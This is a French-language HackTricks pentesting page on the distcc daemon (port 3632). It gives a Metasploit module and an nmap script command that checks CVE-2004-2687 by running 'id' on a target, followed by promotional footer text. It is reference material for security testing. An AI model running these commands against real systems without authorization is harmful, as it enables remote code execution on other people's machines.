2.6 KiB
Informations de base
Distcc est conçu pour accélérer la compilation en utilisant la puissance de traitement inutilisée sur d'autres ordinateurs. Une machine avec distcc installé peut envoyer du code à compiler à travers le réseau vers un ordinateur qui a le démon distccd et un compilateur compatible installé.
Port par défaut: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
Vérifiez si le système est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Shodan
Je ne pense pas que Shodan détecte ce service.
Ressources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post créé par Álex B (@r1p)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.